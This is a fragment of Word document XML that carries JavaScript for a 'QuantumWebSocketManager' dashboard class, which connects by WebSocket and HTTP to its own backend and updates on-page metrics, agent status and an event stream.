    <w:p w14:paraId="4181BF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class QuantumWebSocketManager {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29906D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constructor() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C98C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this.ws = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6324D4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this.reconnectAttempts = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FD09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this.maxReconnectAttempts = 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045555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this.reconnectDelay = 3000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B7D6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this.heartbeatInterval = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAFBB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this.lastHeartbeat = Date.now();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C40D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this.isSimulating = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0356F2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this.simulationInterval = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B125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this.lastData = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE7C9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this.connect();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66397C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673F026" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68D0BB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connect() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAA3B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this.updateConnectionStatus(false, 'Connecting to neural network...');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB537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460EEC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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4597D7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wsUrl = 'wss://suna-alsham-automl-production.up.railway.app/ws';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2747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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔗</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Connecting ALSHAM QUANTUM to:', wsUrl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E7EA6F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A196F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this.ws = new WebSocket(wsUrl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD67C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6B6A8B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this.ws.onopen = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716E1A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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔗</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ALSHAM QUANTUM connected to neural network!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280250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this.reconnectAttempts = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDD60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this.updateConnectionStatus(true, 'Neural network active');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C43B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this.startHeartbeat();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613C81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this.stopSimulation();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6952AC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(window.quantumSoundDesign) window.quantumSoundDesign.play('success');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AFDD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2CBF1010" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D80A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this.ws.onmessage = (event) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531134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this.lastHeartbeat = Date.now();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5618C3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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1AC3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const data = JSON.parse(event.data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C98B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this.handleMessage(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0688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 catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A5F4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console.error('Neural data processing error:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A509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636CC8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5F606B77" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11078B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this.ws.onclose = (event) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698EBD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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔗</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Neural network disconnected:', event.code);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241A64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this.updateConnectionStatus(false, 'Neural network offline');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2381FC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this.stopHeartbeat();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB023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this.attemptReconnect();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C561F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2EFEC387" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E9FCC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this.ws.onerror = (error) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536645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console.error('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Neural network error:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158939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this.updateConnectionStatus(false, 'Connection error');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7C50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(window.quantumSoundDesign) window.quantumSoundDesign.play('error');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5833EF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5B791D4E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50661E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setTimeout(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AF63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(this.ws &amp;&amp; this.ws.readyState === WebSocket.CONNECTING) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B83B3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this.ws.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068D62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this.startHttpFallback();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7903D1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2287C5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 10000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA54936" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F676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catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023F57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console.error('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Neural connection error:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5303D4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this.startHttpFallback();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550E25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1ABA11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6F49D7F6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EEEE7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async startHttpFallback() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E27E8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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initializing HTTP neural bridge...');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1A6A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this.updateConnectionStatus(false, 'HTTP neural bridge active');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C80C1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627F88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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519FD1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response = await fetch('https://suna-alsham-automl-production.up.railway.app/api/metrics');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B32E4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(response.ok) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A85EC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data = await response.json();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC674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this.updateDashboard(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6B68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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📡</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Neural data loaded via HTTP bridge');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4986B1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4F4E8A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setInterval(async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132D1B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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447B2E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const response = await fetch('https://suna-alsham-automl-production.up.railway.app/api/metrics');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B8C2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if (response.ok) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFD79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const data = await response.json();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2774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this.updateDashboard(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB8DD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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481928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} catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084580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console.log('HTTP bridge error, activating simulation mode');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5B75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this.startSimulation();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B42B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F070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}, 5000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0A06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44B62F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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4B9B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throw new Error('HTTP bridge response not ok');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B863A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077473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catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198A4F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console.log('HTTP bridge failed, starting simulation mode');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A11AE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this.startSimulation();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436D54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545C4A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39CD913" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="634096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startHeartbeat() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCF1C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this.heartbeatInterval = setInterval(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078E3B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(this.ws &amp;&amp; this.ws.readyState === WebSocket.OPEN) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769EC9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this.ws.send(JSON.stringify({ type: 'quantum_ping' }));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A2F1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3A0598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03C587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(Date.now() - this.lastHeartbeat &gt; 30000) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF050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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>💔</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Neural heartbeat lost, reconnecting...');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3FB1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this.ws.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9894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4B7A6B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}, 15000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328C3A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8A15FBD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71E2AB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stopHeartbeat() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE3D9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(this.heartbeatInterval) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032129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clearInterval(this.heartbeatInterval);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4EFE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this.heartbeatInterval = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339805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6A2174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0731C52" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B1249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handleMessage(data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078E70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this.lastData = data.data || data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E765C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1DCEA0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switch (data.type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE8BE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case 'initial_data':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE32E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case 'metrics_update':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F88E5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this.updateDashboard(data.data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D7ED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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C70C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case 'cycle_completed':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163E0D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this.handleQuantumCycleEvent(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6589C7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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C510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case 'quantum_pong':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30242B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this.lastHeartbeat = Date.now();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769554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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D533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case 'notification':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6313E5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this.showQuantumNotification(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4F4B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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360A99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default:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBE32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console.log('Unknown neural signal:', data.type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB518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146A5B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F334DF2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E4229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updateDashboard(data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3B7B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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4400E6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Update quantum counter with animation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718E57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(data.cycle_counter) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC86E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this.animateQuantumCounter('quantum-counter', data.cycle_counter.total_cycles);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303225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0EDBAE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uptime = data.cycle_counter.uptime;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD058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uptimeEl = document.getElementById('uptime-display');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE9E9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(uptimeEl &amp;&amp; uptime) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB7BF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uptimeEl.textContent = `System Uptime: ${uptime.days || 0}d ${uptime.hours || 0}h ${uptime.minutes || 0}m`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634565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785D47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2D8DB2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cpsEl = document.getElementById('cycles-per-second');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF941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(cpsEl) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085BBD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cpsEl.textContent = (data.cycle_counter.cycles_per_second || 0).toFixed(3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429079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3B8725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4AAF9BAC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DF3EA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Update neural agents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2164FE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(data.agents) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A715D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this.updateNeuralAgent('core', data.agents.core);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2881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this.updateNeuralAgent('learn', data.agents.learn);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F095B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this.updateNeuralAgent('guard', data.agents.guard);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FEEA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52768C75" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28F756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Update enterprise metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BFFD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(data.system) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677B12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perfEl = document.getElementById('overall-performance');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778764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(perfEl) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203358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perfEl.textContent = Math.round(data.system.performance || 85) + '%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDFB7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5D8BD0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57C974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perfIndEl = document.getElementById('performance-indicator');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668F8A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(perfIndEl) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC585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perfIndEl.textContent = `Performance: ${Math.round(data.system.performance || 85)}%`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A7D8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691B6698" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B3BB1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this.updateSystemHealth(data.system);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1C3F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02C08CD4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FE755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Update enterprise event stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DAB4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(data.recent_events) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595946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this.updateEventStream(data.recent_events);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F70E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30F0CB61" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20B71E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Update neural timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C07F1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(data.timeline_data &amp;&amp; window.neuralTimelineChart) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D8BC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this.updateNeuralChart(data.timeline_data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C39B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4B1FBF1A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BF314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catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576913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console.error('Dashboard update error:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752BAB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75399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D44B6D8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60275A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updateNeuralAgent(agentName, agentData) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CABE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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0E37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(!agentData) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057A7E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475B82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(agentName === 'core') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9FC5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perfEl = document.getElementById('core-performance');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38746E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(perfEl) perfEl.textContent = Math.round((agentData.performance || 0.75) * 100) + '%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CA23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16C0DE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cyclesEl = document.getElementById('core-cycles');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0027E8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(cyclesEl) cyclesEl.textContent = agentData.automl_cycles || 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16097F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057094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techEl = document.getElementById('core-technique');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0B64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(techEl) techEl.textContent = agentData.last_technique || 'Quantum ML';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2D27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525A38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this.updateProgressRing('core-progress', agentData.performance || 0.75);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3E30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6ED0BF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 else if (agentName === 'learn') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59482D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perfEl = document.getElementById('learn-performance');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411079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(perfEl) perfEl.textContent = Math.round((agentData.performance || 0.83) * 100) + '%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30166B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67337E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accEl = document.getElementById('learn-accuracy');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7B8B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(accEl) accEl.textContent = (agentData.accuracy || 94.7).toFixed(1) + '%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ABB4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213409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modelEl = document.getElementById('learn-model');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646488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(modelEl) modelEl.textContent = agentData.last_model || 'Quantum Neural';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE758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693643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this.updateProgressRing('learn-progress', agentData.performance || 0.83);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BEC9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6F372A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 else if (agentName === 'guard') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325B6C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uptimeEl = document.getElementById('guard-uptime');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785A7E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(uptimeEl) uptimeEl.textContent = (agentData.uptime || 99.9).toFixed(1) + '%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C591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306C29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statusEl = document.getElementById('guard-status');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406ED4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(statusEl) statusEl.textContent = agentData.status || 'SECURE';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DED0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5CEC77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protocolEl = document.getElementById('guard-protocol');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AC4D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(protocolEl) protocolEl.textContent = agentData.last_protocol || 'Quantum Shield';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2442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49085C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this.updateProgressRing('guard-progress', (agentData.uptime || 99.9) / 100);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CC97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23DF03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catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA066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console.error(`Error updating neural agent ${agentName}:`, error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8CC0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BCB05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6A2B0D9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A674E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updateSystemHealth(systemData) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7844CE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memoryEl = document.getElementById('memory-usage');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A0B7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(memoryEl) memoryEl.textContent = Math.round(systemData.memory_usage || 64) + '%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB875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417954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cpuEl = document.getElementById('cpu-usage');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A147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(cpuEl) cpuEl.textContent = Math.round(systemData.cpu_usage || 42) + '%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54514F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4E730D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networkEl = document.getElementById('network-status');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDDF8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(networkEl) networkEl.textContent = systemData.network_status || 'OPTIMAL';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149171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AC4C284" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="596702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handleQuantumCycleEvent(eventData) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD958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this.showMicroUpdate(`${eventData.icon || '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>'} ${eventData.message || 'Quantum cycle completed'}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3011D9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37C2CA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(window.quantumSoundDesign) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D529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window.quantumSoundDesign.play('cycle');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A95B0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5B9FBB04" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19D676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this.addEventToStream(eventData);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539F0539" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="169842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('serviceWorker' in navigator &amp;&amp; 'PushManager' in window) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3F37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this.sendQuantumPushNotification(eventData);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162EEC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13E2A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68F5BC33" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3641D1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updateEventStream(events) {</w:t>
